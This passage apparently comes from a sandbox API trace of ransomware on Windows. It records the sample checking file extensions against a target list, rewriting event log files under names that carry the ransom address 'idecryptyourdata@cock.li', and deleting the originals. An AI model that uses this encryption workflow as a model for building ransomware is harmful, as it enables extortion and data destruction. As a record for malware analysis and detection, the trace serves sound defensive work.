"c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 1 [0064.441] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.441] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.441] lstrlenW (lpString=".doc") returned 4 [0064.441] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString=".docx") returned 5 [0064.441] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.441] lstrlenW (lpString=".pdf") returned 4 [0064.441] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString=".xls") returned 4 [0064.441] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString=".xlsx") returned 5 [0064.441] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.441] lstrlenW (lpString=".ppt") returned 4 [0064.441] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.441] lstrlenW (lpString=".zip") returned 4 [0064.441] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString=".rar") returned 4 [0064.441] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.441] lstrlenW (lpString=".bz2") returned 4 [0064.441] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.442] lstrlenW (lpString=".7z") returned 3 [0064.442] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.442] lstrlenW (lpString=".dbf") returned 4 [0064.442] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.442] lstrlenW (lpString=".1cd") returned 4 [0064.442] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.442] lstrlenW (lpString=".jpg") returned 4 [0064.442] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.442] lstrlenW (lpString=".doc") returned 4 [0064.442] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.442] lstrlenW (lpString=".docx") returned 5 [0064.442] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.443] lstrlenW (lpString=".pdf") returned 4 [0064.443] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString=".xls") returned 4 [0064.443] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString=".xlsx") returned 5 [0064.443] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.443] lstrlenW (lpString=".ppt") returned 4 [0064.443] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.443] lstrlenW (lpString=".zip") returned 4 [0064.443] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString=".rar") returned 4 [0064.443] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString=".bz2") returned 4 [0064.443] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString=".7z") returned 3 [0064.443] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.443] lstrlenW (lpString=".dbf") returned 4 [0064.443] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.443] lstrlenW (lpString=".1cd") returned 4 [0064.443] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0064.443] lstrlenW (lpString=".jpg") returned 4 [0064.443] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.443] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.443] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 54 [0064.444] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.444] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.444] CloseHandle (hObject=0x37c) returned 1 [0064.444] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 0x20 [0064.444] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.444] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.444] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.444] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.444] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.445] GetLastError () returned 0x0 [0064.445] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.454] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.456] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.457] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x140, lpOverlapped=0x0) returned 1 [0064.457] SetEndOfFile (hFile=0x370) returned 1 [0064.457] CloseHandle (hObject=0x370) returned 1 [0064.969] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.969] SetEndOfFile (hFile=0x37c) returned 1 [0064.970] CloseHandle (hObject=0x37c) returned 1 [0064.970] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.971] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 1 [0064.971] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.971] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.971] lstrlenW (lpString=".doc") returned 4 [0064.971] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString=".docx") returned 5 [0064.971] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.971] lstrlenW (lpString=".pdf") returned 4 [0064.971] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString=".xls") returned 4 [0064.971] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString=".xlsx") returned 5 [0064.971] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.971] lstrlenW (lpString=".ppt") returned 4 [0064.971] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.971] lstrlenW (lpString=".zip") returned 4 [0064.971] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString=".rar") returned 4 [0064.971] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.971] lstrlenW (lpString=".bz2") returned 4 [0064.972] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString=".7z") returned 3 [0064.972] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString=".dbf") returned 4 [0064.972] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString=".1cd") returned 4 [0064.972] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString=".jpg") returned 4 [0064.972] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString=".doc") returned 4 [0064.972] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString=".docx") returned 5 [0064.972] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.972] lstrlenW (lpString=".pdf") returned 4 [0064.972] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString=".xls") returned 4 [0064.972] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString=".xlsx") returned 5 [0064.972] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.972] lstrlenW (lpString=".ppt") returned 4 [0064.972] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.972] lstrlenW (lpString=".zip") returned 4 [0064.972] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.972] lstrlenW (lpString=".rar") returned 4 [0064.972] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.973] lstrlenW (lpString=".bz2") returned 4 [0064.973] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.973] lstrlenW (lpString=".7z") returned 3 [0064.973] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.973] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.973] lstrlenW (lpString=".dbf") returned 4 [0064.973] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.973] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.973] lstrlenW (lpString=".1cd") returned 4 [0064.973] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.973] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0064.973] lstrlenW (lpString=".jpg") returned 4 [0064.973] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.973] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.973] lstrlenW (lpString="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 47 [0064.973] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.974] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.974] CloseHandle (hObject=0x37c) returned 1 [0064.974] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 0x20 [0064.974] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.974] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.974] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.974] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.974] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.974] GetLastError () returned 0x0 [0064.974] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.977] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.978] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.979] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x132, lpOverlapped=0x0) returned 1 [0064.979] SetEndOfFile (hFile=0x370) returned 1 [0064.979] CloseHandle (hObject=0x370) returned 1 [0064.981] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.981] SetEndOfFile (hFile=0x37c) returned 1 [0064.982] CloseHandle (hObject=0x37c) returned 1 [0064.982] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.982] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 1 [0064.983] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.983] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.983] lstrlenW (lpString=".doc") returned 4 [0064.983] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".docx") returned 5 [0064.983] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.983] lstrlenW (lpString=".pdf") returned 4 [0064.983] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".xls") returned 4 [0064.983] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".xlsx") returned 5 [0064.983] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.983] lstrlenW (lpString=".ppt") returned 4 [0064.983] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.983] lstrlenW (lpString=".zip") returned 4 [0064.983] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".rar") returned 4 [0064.983] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".bz2") returned 4 [0064.983] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.983] lstrlenW (lpString=".7z") returned 3 [0064.983] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.984] lstrlenW (lpString=".dbf") returned 4 [0064.984] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.984] lstrlenW (lpString=".1cd") returned 4 [0064.984] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.984] lstrlenW (lpString=".jpg") returned 4 [0064.984] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.984] lstrlenW (lpString=".doc") returned 4 [0064.984] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString=".docx") returned 5 [0064.984] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.984] lstrlenW (lpString=".pdf") returned 4 [0064.984] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString=".xls") returned 4 [0064.984] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString=".xlsx") returned 5 [0064.984] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.984] lstrlenW (lpString=".ppt") returned 4 [0064.984] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.984] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.985] lstrlenW (lpString=".zip") returned 4 [0064.985] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.985] lstrlenW (lpString=".rar") returned 4 [0064.985] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.985] lstrlenW (lpString=".bz2") returned 4 [0064.985] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.985] lstrlenW (lpString=".7z") returned 3 [0064.985] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.985] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.985] lstrlenW (lpString=".dbf") returned 4 [0064.985] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.985] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.985] lstrlenW (lpString=".1cd") returned 4 [0064.985] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.985] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0064.985] lstrlenW (lpString=".jpg") returned 4 [0064.985] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.985] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.985] lstrlenW (lpString="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 47 [0064.985] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.993] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0064.994] CloseHandle (hObject=0x37c) returned 1 [0064.994] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 0x20 [0064.994] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.994] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0064.994] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.994] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.994] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0064.994] GetLastError () returned 0x0 [0064.994] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.064] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.066] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.066] WriteFile (in: hFile=0x370, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x132, lpOverlapped=0x0) returned 1 [0065.067] SetEndOfFile (hFile=0x370) returned 1 [0065.067] CloseHandle (hObject=0x370) returned 1 [0065.069] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.069] SetEndOfFile (hFile=0x37c) returned 1 [0065.070] CloseHandle (hObject=0x37c) returned 1 [0065.070] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.071] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 1 [0065.071] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.071] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.071] lstrlenW (lpString=".doc") returned 4 [0065.071] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.071] lstrlenW (lpString=".docx") returned 5 [0065.071] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.071] lstrlenW (lpString=".pdf") returned 4 [0065.071] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.071] lstrlenW (lpString=".xls") returned 4 [0065.071] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.071] lstrlenW (lpString=".xlsx") returned 5 [0065.071] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.071] lstrlenW (lpString=".ppt") returned 4 [0065.071] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.071] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.071] lstrlenW (lpString=".zip") returned 4 [0065.071] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.071] lstrlenW (lpString=".rar") returned 4 [0065.072] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString=".bz2") returned 4 [0065.072] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString=".7z") returned 3 [0065.072] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.072] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.072] lstrlenW (lpString=".dbf") returned 4 [0065.072] 